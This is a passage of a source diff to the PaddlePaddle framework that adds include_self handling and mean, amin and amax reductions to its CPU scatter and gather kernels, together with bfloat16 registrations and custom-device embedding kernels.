+    } else if (reduce == "add" || reduce == "mean") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_add_mean_value_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::cpu_scatter_add_mean_value_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
+    } else if (reduce == "mul" || reduce == "multiply" || reduce == "amin" ||
+               reduce == "amax") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::cpu_scatter_mul_min_max_value_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::cpu_scatter_mul_min_max_value_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
     }
   }
 }
diff --git a/paddle/phi/kernels/cpu/put_along_axis_kernel.cc b/paddle/phi/kernels/cpu/put_along_axis_kernel.cc
index 5417f9463a62f8..4411755d61cbaf 100644
--- a/paddle/phi/kernels/cpu/put_along_axis_kernel.cc
+++ b/paddle/phi/kernels/cpu/put_along_axis_kernel.cc
@@ -30,6 +30,7 @@ void PutAlongAxisKernel(const Context& dev_ctx,
                         const DenseTensor& value,
                         int axis,
                         const std::string& reduce,
+                        bool include_self,
                         DenseTensor* out) {
   PADDLE_ENFORCE_EQ(
       dev_ctx.GetPlace().GetType() == phi::AllocationType::CPU,
@@ -41,31 +42,56 @@ void PutAlongAxisKernel(const Context& dev_ctx,
   if (reduce == "add") {
     if (index_type == DataType::INT32) {
       phi::funcs::cpu_scatter_add_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::cpu_scatter_add_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else if (reduce == "multiply" || reduce == "mul") {
     if (index_type == DataType::INT32) {
       phi::funcs::cpu_scatter_mul_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::cpu_scatter_mul_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else if (reduce == "assign") {
     if (index_type == DataType::INT32) {
       phi::funcs::cpu_scatter_assign_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::cpu_scatter_assign_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "mean") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::cpu_scatter_mean_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::cpu_scatter_mean_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "amax") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::cpu_scatter_max_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::cpu_scatter_max_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "amin") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::cpu_scatter_min_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::cpu_scatter_min_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else {
     PADDLE_THROW(errors::InvalidArgument(
         "can not support reduce: '%s' for scatter kernel, only "
-        "support reduce op: 'add', 'assign', 'mul' and 'multiply', the "
+        "support reduce op: 'add', 'assign', 'mul', 'mean', 'amin', 'amax' and "
+        "'multiply', the "
         "default reduce "
         "op is 'assign' ",
         reduce));
diff --git a/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc b/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc
index b7b33d4290daec..66f3ef0cd790d1 100644
--- a/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc
+++ b/paddle/phi/kernels/cpu/repeat_interleave_grad_kernel.cc
@@ -104,7 +104,8 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index_grad,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
 
 PD_REGISTER_KERNEL(repeat_interleave_grad,
                    CPU,
@@ -113,4 +114,5 @@ PD_REGISTER_KERNEL(repeat_interleave_grad,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
diff --git a/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc b/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc
index 388e243eff42a0..8b00d7e38f304c 100644
--- a/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc
+++ b/paddle/phi/kernels/cpu/repeat_interleave_kernel.cc
@@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
 
 PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index,
                    CPU,
@@ -34,4 +35,5 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
diff --git a/paddle/phi/kernels/cpu/set_value_grad_kernel.cc b/paddle/phi/kernels/cpu/set_value_grad_kernel.cc
index ed35513d985505..237a892dbb356c 100644
--- a/paddle/phi/kernels/cpu/set_value_grad_kernel.cc
+++ b/paddle/phi/kernels/cpu/set_value_grad_kernel.cc
@@ -35,3 +35,20 @@ PD_REGISTER_KERNEL(set_value_grad,
                    phi::dtype::float16,
                    phi::dtype::complex<float>,
                    phi::dtype::complex<double>) {}
+
+PD_REGISTER_KERNEL(set_value_with_scalar_grad,
+                   CPU,
+                   ALL_LAYOUT,
+                   phi::SetValueWithScalarGradKernel,
+                   float,
+                   double,
+                   int,
+                   int64_t,
+                   bool,
+                   int16_t,
+                   uint8_t,
+                   int8_t,
+                   phi::dtype::bfloat16,
+                   phi::dtype::float16,
+                   phi::dtype::complex<float>,
+                   phi::dtype::complex<double>) {}
diff --git a/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc b/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc
index 8a7238203ec647..4e5fc0c305100c 100644
--- a/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc
+++ b/paddle/phi/kernels/cpu/take_along_axis_grad_kernel.cc
@@ -50,10 +50,11 @@ void TakeAlongAxisGradKernel(const Context& dev_ctx,
         axis,
         index,
         out_grad,
+        true,
         dev_ctx);  // the gradient of gather is scatter
   } else if (index_type == phi::DataType::INT64) {
     phi::funcs::cpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, index, out_grad, dev_ctx);
+        *x_grad, axis, index, out_grad, true, dev_ctx);
   }
 }
 
diff --git a/paddle/phi/kernels/cpu/take_along_axis_kernel.cc b/paddle/phi/kernels/cpu/take_along_axis_kernel.cc
index d1b4a24b54eba5..d006f688ae2434 100644
--- a/paddle/phi/kernels/cpu/take_along_axis_kernel.cc
+++ b/paddle/phi/kernels/cpu/take_along_axis_kernel.cc
@@ -38,9 +38,11 @@ void TakeAlongAxisKernel(const Context& dev_ctx,
 
   const auto& index_type = index.dtype();
   if (index_type == DataType::INT32) {
-    phi::funcs::cpu_gather_kernel<T, int32_t>(x, axis, index, *out, dev_ctx);
+    phi::funcs::cpu_gather_kernel<T, int32_t>(
+        x, axis, index, *out, true, dev_ctx);
   } else if (index_type == DataType::INT64) {
-    phi::funcs::cpu_gather_kernel<T, int64_t>(x, axis, index, *out, dev_ctx);
+    phi::funcs::cpu_gather_kernel<T, int64_t>(
+        x, axis, index, *out, true, dev_ctx);
   }
 }
 
diff --git a/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc b/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc
new file mode 100644
index 00000000000000..ff61688513b139
--- /dev/null
+++ b/paddle/phi/kernels/custom/c_embedding_grad_kernel.cc
@@ -0,0 +1,93 @@
+// Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+#include "paddle/phi/kernels/c_embedding_grad_kernel.h"
+#include "glog/logging.h"
+#include "paddle/phi/api/backward/backward_api.h"
+#include "paddle/phi/api/include/api.h"
+#include "paddle/phi/backends/all_context.h"
+#include "paddle/phi/common/float16.h"
+#include "paddle/phi/core/kernel_registry.h"
+
+namespace phi {
+
+#ifdef PADDLE_WITH_CUSTOM_DEVICE
+template <typename T, typename Context>
+void CEmbeddingGradKernel(const Context& dev_ctx,
+                          const DenseTensor& w,
+                          const DenseTensor& ids,
+                          const DenseTensor& out_grad,
+                          int64_t start_index,
+                          DenseTensor* w_grad) {
+  w_grad->Resize(w.dims());
+  dev_ctx.template Alloc(w_grad, w.dtype());
+  const auto& index_type = ids.dtype();
+  if (index_type == phi::DataType::INT32 ||
+      index_type == phi::DataType::INT64) {
+    auto K = ids.numel();
+    auto N = w.dims()[0];
+    auto D = w.dims()[1];
+
+    auto x_tmp = std::make_shared<phi::DenseTensor>();
+    x_tmp->ShareDataWith(ids).Resize({K});
+    auto w_tmp = std::make_shared<phi::DenseTensor>();
+    w_tmp->set_meta(w.meta());
+    dev_ctx.Alloc(w_tmp.get(), w_tmp->dtype());
+    auto out_grad_tmp = std::make_shared<phi::DenseTensor>();
+    out_grad_tmp->ShareDataWith(out_grad).Resize({K, D});
+    paddle::Tensor x_tensor(x_tmp), w_tensor(w_tmp),
+        out_grad_tensor(out_grad_tmp);
+
+    auto start_index_tensor = paddle::experimental::full_like(
+        x_tensor, start_index, x_tensor.dtype(), x_tensor.place());
+    auto end_index_tensor = paddle::experimental::full_like(
+        x_tensor, start_index + N, x_tensor.dtype(), x_tensor.place());
+    auto ids_mask_tensor = paddle::experimental::logical_and(
+        x_tensor.greater_equal(start_index_tensor),
+        x_tensor.less_than(end_index_tensor));
+    auto real_ids_tensor = (x_tensor - start_index_tensor)
+                               .multiply(paddle::experimental::cast(
+                                   ids_mask_tensor, x_tensor.dtype()));
+    auto out_grad_tensor_mul_mask =
+        paddle::experimental::reshape(out_grad_tensor, {K, D})
+            .multiply(paddle::experimental::reshape(
+                paddle::experimental::cast(ids_mask_tensor, w.dtype()),
+                {K, 1}));
+    paddle::Tensor w_grad_tensor;
+    paddle::experimental::embedding_grad(real_ids_tensor,
+                                         w_tensor,
+                                         out_grad_tensor_mul_mask,
+                                         -1,
+                                         false,
+                                         &w_grad_tensor);
+    w_grad->ShareDataWith(
+        *reinterpret_cast<phi::DenseTensor*>(w_grad_tensor.impl().get()));
+
+  } else {
+    PADDLE_THROW(phi::errors::Unavailable(
+        "Custom Device c_embedding_grad ids only support int32 or int64."));
+  }
+}
+#endif
+}  // namespace phi
+
+#ifdef PADDLE_WITH_CUSTOM_DEVICE
+PD_REGISTER_KERNEL(c_embedding_grad,
+                   Custom,
+                   ALL_LAYOUT,
+                   phi::CEmbeddingGradKernel,
+                   float,
+                   phi::dtype::float16,
+                   phi::dtype::bfloat16) {}
+#endif
diff --git a/paddle/phi/kernels/custom/c_embedding_kernel.cc b/paddle/phi/kernels/custom/c_embedding_kernel.cc
new file mode 100644
index 00000000000000..0cacf61d46f3a8
--- /dev/null
+++ b/paddle/phi/kernels/custom/c_embedding_kernel.cc
@@ -0,0 +1,84 @@
+// Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+#include "paddle/phi/kernels/c_embedding_kernel.h"
+#include "glog/logging.h"
+#include "paddle/phi/api/backward/backward_api.h"
+#include "paddle/phi/api/include/api.h"
+#include "paddle/phi/backends/all_context.h"
+#include "paddle/phi/common/float16.h"
+#include "paddle/phi/core/kernel_registry.h"
+
+namespace phi {
+
+#ifdef PADDLE_WITH_CUSTOM_DEVICE
+template <typename T, typename Context>
+void CEmbeddingKernel(const Context& dev_ctx,
+                      const DenseTensor& w,
+                      const DenseTensor& ids,
+                      int64_t start_index,
+                      int64_t vocab_size,
+                      DenseTensor* out) {
+  const auto& index_type = ids.dtype();
+  if (index_type == phi::DataType::INT32 ||
+      index_type == phi::DataType::INT64) {
+    auto out_dims = out->dims();
+    auto K = ids.numel();
+    auto N = w.dims()[0];
+    auto D = w.dims()[1];
+
+    auto x_tmp = std::make_shared<phi::DenseTensor>();
+    x_tmp->ShareDataWith(ids).Resize({K});
+    auto w_tmp = std::make_shared<phi::DenseTensor>();
+    w_tmp->ShareDataWith(w).Resize({N, D});
+    paddle::Tensor x_tensor(x_tmp), w_tensor(w_tmp);
+
+    auto start_index_tensor = paddle::experimental::full_like(
+        x_tensor, start_index, x_tensor.dtype(), x_tensor.place());
+    auto end_index_tensor = paddle::experimental::full_like(
+        x_tensor, start_index + N, x_tensor.dtype(), x_tensor.place());
+    auto ids_mask_tensor = paddle::experimental::logical_and(
+        x_tensor.greater_equal(start_index_tensor),
+        x_tensor.less_than(end_index_tensor));
+    auto ids_tensor = (x_tensor - start_index_tensor)
+                          .multiply(paddle::experimental::cast(
+                              ids_mask_tensor, x_tensor.dtype()));
+    auto out_tensor =
+        paddle::experimental::reshape(
+            paddle::experimental::cast(ids_mask_tensor, w_tensor.dtype()),
+            {K, 1})
+            .multiply(paddle::experimental::reshape(
+                paddle::experimental::embedding(
+                    ids_tensor, w_tensor, -1, false),
+                {K, D}));
+    out->ShareDataWith(
+           *reinterpret_cast<phi::DenseTensor*>(out_tensor.impl().get()))
+        .Resize(out_dims);
+  } else {
+    PADDLE_THROW(phi::errors::Unavailable(
+        "Custom Device c_embedding ids only support int32 or int64."));
+  }
+}
+#endif
+}  // namespace phi
+
+#ifdef PADDLE_WITH_CUSTOM_DEVICE
+PD_REGISTER_KERNEL(c_embedding,
+                   Custom,
+                   ALL_LAYOUT,
+                   phi::CEmbeddingKernel,
+                   float,
+                   phi::dtype::float16,
+                   phi::dtype::bfloat16) {}
+#endif
diff --git a/paddle/phi/kernels/funcs/CMakeLists.txt b/paddle/phi/kernels/funcs/CMakeLists.txt
index f2d43a19a246d6..3b63d4f2ab407a 100644
--- a/paddle/phi/kernels/funcs/CMakeLists.txt
+++ b/paddle/phi/kernels/funcs/CMakeLists.txt
@@ -15,6 +15,9 @@ if(WITH_GPU OR WITH_ROCM OR WITH_MUSA)
     "*.cu")
 endif()
 
+if(WITH_ROCM)
+  list(REMOVE_ITEM func_cu_srcs "weight_only_gemv.cu")
+endif()  
 if(WITH_MUSA)
   list(REMOVE_ITEM func_cu_srcs 
       "softmax.cu")
diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.cc b/paddle/phi/kernels/funcs/gather_scatter_functor.cc
index 7be86351c47ff6..ca6c44dbdbd761 100644
--- a/paddle/phi/kernels/funcs/gather_scatter_functor.cc
+++ b/paddle/phi/kernels/funcs/gather_scatter_functor.cc
@@ -48,6 +48,24 @@ class ReduceMultiply {
 };
 static ReduceMultiply reduce_mul;
 
+class ReduceMax {
+ public:
+  template <typename tensor_t>
+  void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    *self_data = *src_data > *self_data ? *src_data : *self_data;
+  }
+};
+static ReduceMax reduce_max;
+
+class ReduceMin {
+ public:
+  template <typename tensor_t>
+  void operator()(tensor_t* self_data, tensor_t* src_data) const {
+    *self_data = *src_data < *self_data ? *src_data : *self_data;
+  }
+};
+static ReduceMin reduce_min;
+
 template <typename tensor_t,
           typename index_t = int64_t,
           bool is_scatter_like = true>
@@ -55,10 +73,11 @@ struct cpu_gather_scatter_functor {
   template <typename func_t>
   void operator()(phi::DenseTensor self,
                   int dim,
-                  const phi::DenseTensor& index UNUSED,
+                  const phi::DenseTensor& index,
                   const phi::DenseTensor& src,
-                  const std::string& method_name UNUSED,
+                  const std::string& method_name,
                   const func_t& reduce_op,
+                  bool include_self,
                   const phi::DeviceContext& ctx UNUSED) {
     if (index.numel() == 0) {
       return;
@@ -96,6 +115,7 @@ struct cpu_gather_scatter_functor {
       outer_dim_size_src *= src_dims[i];
     }
     int64_t index_idx = 0;
+    std::vector<int> nums_of_elements(self.numel(), 0);
     // N layer loop squeezed into 3 layers loop
     for (int64_t i = 0; i < inner_dim_size; i++) {
       for (int64_t j = 0; j < select_dim_size; j++) {
@@ -132,12 +152,31 @@ struct cpu_gather_scatter_functor {
             replace_index_src = k + index * outer_dim_size_src +
                                 i * outer_dim_size_src * src_select_dim_size;
           }
-          reduce_op((tensor_t*)(self_data + replace_index_self),  // NOLINT
-                    (tensor_t*)(src_data + replace_index_src));   // NOLINT
+          if (include_self == false &&
+              nums_of_elements[replace_index_self] == 0) {
+            self_data[replace_index_self] = src_data[replace_index_src];
+          } else {
+            reduce_op((tensor_t*)(self_data + replace_index_self),  // NOLINT
+                      (tensor_t*)(src_data + replace_index_src));   // NOLINT
+          }
+          nums_of_elements[replace_index_self] += 1;
           index_idx++;
         }
       }
     }
+    if (method_name == "scatter_mean_cpu") {
+      for (int i = 0; i < self_size; i++) {
+        if (nums_of_elements[i]) {
+          if (include_self) {
+            self_data[i] =
+                self_data[i] / static_cast<tensor_t>(nums_of_elements[i] + 1);
+          } else {
+            self_data[i] =
+                self_data[i] / static_cast<tensor_t>(nums_of_elements[i]);
+          }
+        }
+      }
+    }
   }
 };
 
@@ -146,11 +185,18 @@ void cpu_gather_kernel(phi::DenseTensor self,
                        int dim,
                        const phi::DenseTensor& index,
                        phi::DenseTensor result,
+                       bool include_self,
                        const phi::DeviceContext& ctx) {
   cpu_gather_scatter_functor<tensor_t,
                              index_t,
-                             /*is_scatter_like=*/false>()(
-      result, dim, index, self, "gather_out_cpu", tensor_assign, ctx);
+                             /*is_scatter_like=*/false>()(result,
+                                                          dim,
+                                                          index,
+                                                          self,
+                                                          "gather_out_cpu",
+                                                          tensor_assign,
+                                                          include_self,
+                                                          ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -158,11 +204,18 @@ void cpu_scatter_assign_kernel(phi::DenseTensor self,
                                int dim,
                                const phi::DenseTensor& index,
                                phi::DenseTensor src,
+                               bool include_self,
                                const phi::DeviceContext& ctx) {
   cpu_gather_scatter_functor<tensor_t,
                              index_t,
-                             /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_assign_cpu", tensor_assign, ctx);
+                             /*is_scatter_like=*/true>()(self,
+                                                         dim,
+                                                         index,
+                                                         src,
+                                                         "scatter_assign_cpu",
+                                                         tensor_assign,
+                                                         include_self,
+                                                         ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -170,11 +223,12 @@ void cpu_scatter_add_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx) {
   cpu_gather_scatter_functor<tensor_t,
                              index_t,
                              /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_add_cpu", reduce_add, ctx);
+      self, dim, index, src, "scatter_add_cpu", reduce_add, include_self, ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -182,11 +236,51 @@ void cpu_scatter_mul_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx) {
+  cpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_mul_cpu", reduce_mul, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mean_kernel(phi::DenseTensor self,
+                             int dim,
+                             const phi::DenseTensor& index,
+                             phi::DenseTensor src,
+                             bool include_self,
+                             const phi::DeviceContext& ctx) {
+  cpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_mean_cpu", reduce_add, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_max_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx) {
+  cpu_gather_scatter_functor<tensor_t,
+                             index_t,
+                             /*is_scatter_like=*/true>()(
+      self, dim, index, src, "scatter_max_cpu", reduce_max, include_self, ctx);
+}
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_min_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx) {
   cpu_gather_scatter_functor<tensor_t,
                              index_t,
                              /*is_scatter_like=*/true>()(
-      self, dim, index, src, "scatter_mul_cpu", reduce_mul, ctx);
+      self, dim, index, src, "scatter_min_cpu", reduce_min, include_self, ctx);
 }
 
 template <typename tensor_t, typename index_t>
@@ -194,6 +288,7 @@ void cpu_scatter_input_grad_kernel(phi::DenseTensor self UNUSED,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self UNUSED,
                                    const phi::DeviceContext& ctx UNUSED) {
   auto* index_data = index.data<index_t>();
   auto* grad_data = grad.data<tensor_t>();
@@ -229,11 +324,135 @@ void cpu_scatter_input_grad_kernel(phi::DenseTensor self UNUSED,
   }
 }
 
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self UNUSED,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self UNUSED,
+                                               const phi::DeviceContext& ctx) {
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+  auto* out_data = out.data<tensor_t>();
+  auto* x_data = x.data<tensor_t>();
+  auto* value_data = value.data<tensor_t>();
+
+  int64_t grad_size = grad.numel();
+  auto index_dims = index.dims();
+  auto grad_dims = grad.dims();
+  auto value_dims = value.dims();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t outer_dim_size_value = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  int64_t value_select_dim_size = value_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+    outer_dim_size_value *= value_dims[i];
+  }
+
+  int64_t index_idx = 0;
+  std::vector<int> num_elements(grad_size, 0);
+  for (int64_t i = 0; i < inner_dim_size; i++) {
+    for (int64_t j = 0; j < select_dim_size; j++) {
+      for (int64_t k = 0; k < outer_dim_size; k++) {
+        int64_t index = index_data[index_idx];
+        int64_t replace_index_grad =
+            k + index * outer_dim_size_grad +
+            i * outer_dim_size_grad * grad_select_dim_size;
+        if ((reduce == "multiply" || reduce == "mul") &&
+            num_elements[replace_index_grad] == 0) {
+          grad_data[replace_index_grad] = static_cast<tensor_t>(
+              grad_data[replace_index_grad] * out_data[replace_index_grad] /
+              x_data[replace_index_grad]);
+          num_elements[replace_index_grad] += 1;
+        } else if (reduce == "amin" || reduce == "amax") {
+          if (out_data[replace_index_grad] != x_data[replace_index_grad]) {
+            grad_data[replace_index_grad] = 0;
+          } else {
+            int64_t replace_index_value =
+                k + j * outer_dim_size_value +
+                i * outer_dim_size_value * value_select_dim_size;
+            if (out_data[replace_index_grad] == value_data[replace_index_value])
+              num_elements[replace_index_grad] += 1;
+          }
+        }
+        index_idx++;
+      }
+    }
+  }
+  if (reduce == "amin" || reduce == "amax") {
+    for (int64_t i = 0; i < grad_size; i++) {
+      grad_data[i] = grad_data[i] / static_cast<tensor_t>(num_elements[i] + 1);
+    }
+  }
+}
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mean_input_grad_kernel(phi::DenseTensor self UNUSED,
+                                        int dim,
+                                        const phi::DenseTensor& index,
+                                        phi::DenseTensor grad,
+                                        bool include_self UNUSED,
+                                        const phi::DeviceContext& ctx UNUSED) {
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto grad_dims = grad.dims();
+
+  int64_t grad_size = grad.numel();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_data = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_data *= grad_dims[i];
+  }
+
+  int64_t index_idx = 0;
+  std::vector<int> num_elements(grad_size, 0);
+  for (int64_t i = 0; i < inner_dim_size; i++) {
+    for (int64_t j = 0; j < select_dim_size; j++) {
+      for (int64_t k = 0; k < outer_dim_size; k++) {
+        int64_t index = index_data[index_idx];
+        int64_t replace_index = k + index * outer_dim_size_data +
+                                i * outer_dim_size_data * grad_select_dim_size;
+        num_elements[replace_index] += 1;
+        index_idx++;
+      }
+    }
+  }
+  for (int64_t i = 0; i < grad_size; i++)
+    if (num_elements[i])
+      grad_data[i] = grad_data[i] / static_cast<tensor_t>(num_elements[i] + 1);
+}
+
 template <typename tensor_t, typename index_t>
 void cpu_scatter_value_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self UNUSED,
                                    const phi::DeviceContext& ctx UNUSED) {
   auto* self_data = self.data<tensor_t>();
   auto* index_data = index.data<index_t>();
@@ -244,11 +463,75 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self,
   auto grad_dims = grad.dims();
 
   int64_t self_size = self.numel();
-  int64_t grad_size = grad.numel();
-  bool* is_self_grad_used = new bool[self_size];
+  std::vector<bool> is_self_grad_used(self_size, false);
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_self = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t self_select_dim_size = self_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_self *= self_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+  }
+  int64_t index_idx = index.numel() - 1;
+  for (int64_t i = inner_dim_size - 1; i >= 0; i--) {
+    for (int64_t j = select_dim_size - 1; j >= 0; j--) {
+      for (int64_t k = outer_dim_size - 1; k >= 0; k--) {
+        int64_t index = index_data[index_idx];
+        int64_t replace_index_self =
+            k + index * outer_dim_size_self +
+            i * outer_dim_size_self * self_select_dim_size;
+        int64_t replace_index_grad =
+            k + j * outer_dim_size_grad +
+            i * outer_dim_size_grad * grad_select_dim_size;
+        if (!is_self_grad_used[replace_index_self]) {
+          grad_data[replace_index_grad] = self_data[replace_index_self];
+          is_self_grad_used[replace_index_self] = true;
+        }
+        index_idx--;
+      }
+    }
+  }
+}
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_add_mean_value_grad_kernel(
+    phi::DenseTensor self,
+    int dim,
+    const phi::DenseTensor& index,
+    const phi::DenseTensor& out UNUSED,
+    const phi::DenseTensor& x UNUSED,
+    const phi::DenseTensor& value UNUSED,
+    phi::DenseTensor grad,
+    const std::string& reduce,
+    bool include_self,
+    const phi::DeviceContext& ctx UNUSED) {
+  auto* self_data = self.data<tensor_t>();
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto self_dims = self.dims();
+  auto grad_dims = grad.dims();
 
-  for (int i = 0; i < self_size; i++) {
-    is_self_grad_used[i] = false;
+  int64_t self_size = self.numel();
+  int64_t grad_size = grad.numel();
+  std::vector<int> num_elements;
+  if (reduce == "mean") {
+    for (int i = 0; i < self_size; i++) {
+      if (include_self)
